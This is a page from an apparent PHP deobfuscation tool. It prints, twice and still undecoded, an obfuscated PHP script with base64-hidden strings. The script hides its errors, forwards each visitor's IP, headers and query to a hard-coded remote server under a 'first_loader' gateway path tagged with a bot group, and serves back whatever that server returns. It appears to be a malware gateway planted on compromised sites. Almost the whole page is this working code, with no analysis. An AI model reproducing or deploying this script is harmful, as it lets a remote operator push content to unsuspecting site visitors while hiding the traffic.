Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php date_default_timezone_set(base64_decode('ZXVyb3BlL21vc2Nvdw=='));$t0=0;if($t0==0){in..

Decoded Output download

<?php date_default_timezone_set(base64_decode('ZXVyb3BlL21vc2Nvdw=='));$t0=0;if($t0==0){ini_set(base64_decode('ZGlzcGxheV9lcnJvcnM='),0);ini_set(base64_decode('ZGlzcGxheV9zdGFydHVwX2Vycm9ycw=='),0);error_reporting(0);}else{ini_set(base64_decode('ZGlzcGxheV9lcnJvcnM='),1);ini_set(base64_decode('ZGlzcGxheV9zdGFydHVwX2Vycm9ycw=='),1);error_reporting(E_ALL);}$g1=base64_decode('MTkzLjIwMS45Ljkz');$p2=base64_decode('NDQz');$k3=base64_decode('Zmlyc3RfbG9hZGVyL2ZpcnN0X2xvYWRlcl9ndy5waHA=');$y4=dirname(__FILE__).base64_decode('L3Byb3h5X2xvZy50eHQ=');$k5='';$e6='';$g7=$_SERVER[base64_decode('UkVNT1RFX0FERFI=')];if(isset($_SERVER[base64_decode('SFRUUF9YX1JFQUxfSVA=')])){$g7=$_SERVER[base64_decode('SFRUUF9YX1JFQUxfSVA=')];}else if(isset($_SERVER[base64_decode('SFRUUF9DRl9DT05ORUNUSU5HX0lQ')])){$g7=$_SERVER[base64_decode('SFRUUF9DRl9DT05ORUNUSU5HX0lQ')];}if(isset($_SERVER[base64_decode('UkVRVUVTVF9VUkk=')])){$g8=Array();if(preg_match(base64_decode('L1wvKFteXC9dK1wuW14/Jl0rKS9p'),$_SERVER[base64_decode('UkVRVUVTVF9VUkk=')],$g8)){if(function_exists(base64_decode('b3BjYWNoZV9pbnZhbGlkYXRl'))){opcache_invalidate(base64_decode('Y29uZi5waHA='));}include(base64_decode('Y29uZi5waHA='));$k3="$k3?fname=".$g8[1];if(isset($_SERVER[base64_decode('UVVFUllfU1RSSU5H')])&&strlen($_SERVER[base64_decode('UVVFUllfU1RSSU5H')])>0){if(!isset($_GET[base64_decode('Ymc=')])){$k3.="&bg=$bot_group";}$k3.=base64_decode('Jg==').$_SERVER[base64_decode('UVVFUllfU1RSSU5H')];}else{$k3.="&bg=$bot_group";}}else{printbase64_decode('UkVRVUVTVCBFUlJPUiAxPGJyPlJFUVVFU1RfVVJJPSc=').$_SERVER[base64_decode('UkVRVUVTVF9VUkk=')].base64_decode('Jzxicj4K');exit(0);}}else{printbase64_decode('JF9TRVJWRVJbUkVRVUVTVF9VUkldIG5vdCBmb3VuZCA8YnI+XG4=');exit(0);}$y10="http://$g1:$p2/$k3";print_dbg(base64_decode('PT09IG1ldGhvZD0=').$_SERVER[base64_decode('UkVRVUVTVF9NRVRIT0Q=')].base64_decode('IGlwPSc=').$_SERVER[base64_decode('UkVNT1RFX0FERFI=')].base64_decode('JyBSRVFVRVNUX1VSST0n').$_SERVER[base64_decode('UkVRVUVTVF9VUkk=')]."' target_url='$y10' QUERY_STRING=".$_SERVER[base64_decode('UVVFUllfU1RSSU5H')].base64_decode('Cg=='));$y11=array("Host: $g1",base64_decode('WC1Gb3J3YXJkZWQtRm9yLUNsaWVudDog').$g7,base64_decode('WC1Gb3J3YXJkZWQtRm9yLUdhdGV3YXk6IA==').$_SERVER[base64_decode('SFRUUF9IT1NU')]);if(isset($_SERVER[base64_decode('SFRUUF9VU0VSX0FHRU5U')])){array_push($y11,base64_decode('VXNlci1BZ2VudDog').$_SERVER[base64_decode('SFRUUF9VU0VSX0FHRU5U')]);}if(isset($_SERVER[base64_decode('SFRUUF9SQU5HRQ==')])){array_push($y11,base64_decode('UmFuZ2U6IA==').$_SERVER[base64_decode('SFRUUF9SQU5HRQ==')]);}if(isset($_SERVER[base64_decode('SFRUUF9JRl9VTk1PRElGSUVEX1NJTkNF')])){array_push($y11,base64_decode('SWYtVW5tb2RpZmllZC1TaW5jZTog').$_SERVER[base64_decode('SFRUUF9JRl9VTk1PRElGSUVEX1NJTkNF')]);}$m12=array();$x13=curl_init();if($_SERVER[base64_decode('UkVRVUVTVF9NRVRIT0Q=')]==base64_decode('SEVBRA==')){curl_setopt($x13,CURLOPT_NOBODY,true);}curl_setopt($x13,CURLOPT_URL,"$y10");curl_setopt($x13,CURLOPT_HTTPHEADER,$y11);curl_setopt($x13,CURLOPT_HEADER,0);curl_setopt($x13,CURLOPT_RETURNTRANSFER,true);curl_setopt($x13,CURLOPT_FAILONERROR,true);curl_setopt($x13,CURLOPT_HEADERFUNCTION,base64_decode('SGFuZGxlSGVhZGVyTGluZQ=='));$m14=curl_exec($x13);if(curl_error($x13)){$x15=curl_error($x13);print_dbg("GET error: $x15");$w16=curl_getinfo($x13,CURLINFO_HTTP_CODE);if($w16){print_dbg("HTTP CODE: $w16");}curl_close($x13);return;}$w16=curl_getinfo($x13,CURLINFO_HTTP_CODE);foreach($m12 as $t17){header($t17);}if(isset($_SERVER[base64_decode('SFRUUF9QUk9YWV9DT05ORUNUSU9O')])){header(base64_decode('UHJveHktQ29ubmVjdGlvbjog').$_SERVER[base64_decode('SFRUUF9QUk9YWV9DT05ORUNUSU9O')]);}if(isset($_SERVER[base64_decode('SFRUUF9YX0ZPUldBUkRFRF9GT1I=')])){header(base64_decode('WC1Gb3J3YXJkZWQtRm9yOiA=').$_SERVER[base64_decode('SFRUUF9YX0ZPUldBUkRFRF9GT1I=')]);}print$m14;function HandleHeaderLine($x13,$d18){global $m12;array_push($m12,$d18);return strlen($d18);}function print_dbg($b19){global $y4,$t0;if($t0>0){file_put_contents($y4,base64_decode('Ww==').date(base64_decode('SDppOnMgZC9tL1k=')).base64_decode('XQk=').rtrim($b19).base64_decode('Cg=='),FILE_APPEND|LOCK_EX);}}?>

Did this file decode correctly?

Original Code

<?php date_default_timezone_set(base64_decode('ZXVyb3BlL21vc2Nvdw=='));$t0=0;if($t0==0){ini_set(base64_decode('ZGlzcGxheV9lcnJvcnM='),0);ini_set(base64_decode('ZGlzcGxheV9zdGFydHVwX2Vycm9ycw=='),0);error_reporting(0);}else{ini_set(base64_decode('ZGlzcGxheV9lcnJvcnM='),1);ini_set(base64_decode('ZGlzcGxheV9zdGFydHVwX2Vycm9ycw=='),1);error_reporting(E_ALL);}$g1=base64_decode('MTkzLjIwMS45Ljkz');$p2=base64_decode('NDQz');$k3=base64_decode('Zmlyc3RfbG9hZGVyL2ZpcnN0X2xvYWRlcl9ndy5waHA=');$y4=dirname(__FILE__).base64_decode('L3Byb3h5X2xvZy50eHQ=');$k5='';$e6='';$g7=$_SERVER[base64_decode('UkVNT1RFX0FERFI=')];if(isset($_SERVER[base64_decode('SFRUUF9YX1JFQUxfSVA=')])){$g7=$_SERVER[base64_decode('SFRUUF9YX1JFQUxfSVA=')];}else if(isset($_SERVER[base64_decode('SFRUUF9DRl9DT05ORUNUSU5HX0lQ')])){$g7=$_SERVER[base64_decode('SFRUUF9DRl9DT05ORUNUSU5HX0lQ')];}if(isset($_SERVER[base64_decode('UkVRVUVTVF9VUkk=')])){$g8=Array();if(preg_match(base64_decode('L1wvKFteXC9dK1wuW14/Jl0rKS9p'),$_SERVER[base64_decode('UkVRVUVTVF9VUkk=')],$g8)){if(function_exists(base64_decode('b3BjYWNoZV9pbnZhbGlkYXRl'))){opcache_invalidate(base64_decode('Y29uZi5waHA='));}include(base64_decode('Y29uZi5waHA='));$k3="$k3?fname=".$g8[1];if(isset($_SERVER[base64_decode('UVVFUllfU1RSSU5H')])&&strlen($_SERVER[base64_decode('UVVFUllfU1RSSU5H')])>0){if(!isset($_GET[base64_decode('Ymc=')])){$k3.="&bg=$bot_group";}$k3.=base64_decode('Jg==').$_SERVER[base64_decode('UVVFUllfU1RSSU5H')];}else{$k3.="&bg=$bot_group";}}else{printbase64_decode('UkVRVUVTVCBFUlJPUiAxPGJyPlJFUVVFU1RfVVJJPSc=').$_SERVER[base64_decode('UkVRVUVTVF9VUkk=')].base64_decode('Jzxicj4K');exit(0);}}else{printbase64_decode('JF9TRVJWRVJbUkVRVUVTVF9VUkldIG5vdCBmb3VuZCA8YnI+XG4=');exit(0);}$y10="http://$g1:$p2/$k3";print_dbg(base64_decode('PT09IG1ldGhvZD0=').$_SERVER[base64_decode('UkVRVUVTVF9NRVRIT0Q=')].base64_decode('IGlwPSc=').$_SERVER[base64_decode('UkVNT1RFX0FERFI=')].base64_decode('JyBSRVFVRVNUX1VSST0n').$_SERVER[base64_decode('UkVRVUVTVF9VUkk=')]."' target_url='$y10' QUERY_STRING=".$_SERVER[base64_decode('UVVFUllfU1RSSU5H')].base64_decode('Cg=='));$y11=array("Host: $g1",base64_decode('WC1Gb3J3YXJkZWQtRm9yLUNsaWVudDog').$g7,base64_decode('WC1Gb3J3YXJkZWQtRm9yLUdhdGV3YXk6IA==').$_SERVER[base64_decode('SFRUUF9IT1NU')]);if(isset($_SERVER[base64_decode('SFRUUF9VU0VSX0FHRU5U')])){array_push($y11,base64_decode('VXNlci1BZ2VudDog').$_SERVER[base64_decode('SFRUUF9VU0VSX0FHRU5U')]);}if(isset($_SERVER[base64_decode('SFRUUF9SQU5HRQ==')])){array_push($y11,base64_decode('UmFuZ2U6IA==').$_SERVER[base64_decode('SFRUUF9SQU5HRQ==')]);}if(isset($_SERVER[base64_decode('SFRUUF9JRl9VTk1PRElGSUVEX1NJTkNF')])){array_push($y11,base64_decode('SWYtVW5tb2RpZmllZC1TaW5jZTog').$_SERVER[base64_decode('SFRUUF9JRl9VTk1PRElGSUVEX1NJTkNF')]);}$m12=array();$x13=curl_init();if($_SERVER[base64_decode('UkVRVUVTVF9NRVRIT0Q=')]==base64_decode('SEVBRA==')){curl_setopt($x13,CURLOPT_NOBODY,true);}curl_setopt($x13,CURLOPT_URL,"$y10");curl_setopt($x13,CURLOPT_HTTPHEADER,$y11);curl_setopt($x13,CURLOPT_HEADER,0);curl_setopt($x13,CURLOPT_RETURNTRANSFER,true);curl_setopt($x13,CURLOPT_FAILONERROR,true);curl_setopt($x13,CURLOPT_HEADERFUNCTION,base64_decode('SGFuZGxlSGVhZGVyTGluZQ=='));$m14=curl_exec($x13);if(curl_error($x13)){$x15=curl_error($x13);print_dbg("GET error: $x15");$w16=curl_getinfo($x13,CURLINFO_HTTP_CODE);if($w16){print_dbg("HTTP CODE: $w16");}curl_close($x13);return;}$w16=curl_getinfo($x13,CURLINFO_HTTP_CODE);foreach($m12 as $t17){header($t17);}if(isset($_SERVER[base64_decode('SFRUUF9QUk9YWV9DT05ORUNUSU9O')])){header(base64_decode('UHJveHktQ29ubmVjdGlvbjog').$_SERVER[base64_decode('SFRUUF9QUk9YWV9DT05ORUNUSU9O')]);}if(isset($_SERVER[base64_decode('SFRUUF9YX0ZPUldBUkRFRF9GT1I=')])){header(base64_decode('WC1Gb3J3YXJkZWQtRm9yOiA=').$_SERVER[base64_decode('SFRUUF9YX0ZPUldBUkRFRF9GT1I=')]);}print$m14;function HandleHeaderLine($x13,$d18){global $m12;array_push($m12,$d18);return strlen($d18);}function print_dbg($b19){global $y4,$t0;if($t0>0){file_put_contents($y4,base64_decode('Ww==').date(base64_decode('SDppOnMgZC9tL1k=')).base64_decode('XQk=').rtrim($b19).base64_decode('Cg=='),FILE_APPEND|LOCK_EX);}}?>

Function Calls

base64_decode 1
date_default_timezone_set 1

Variables

None

Stats

MD5 51f1df384682580a5ecbae62cdd01b4f
Eval Count 0
Decode Time 68 ms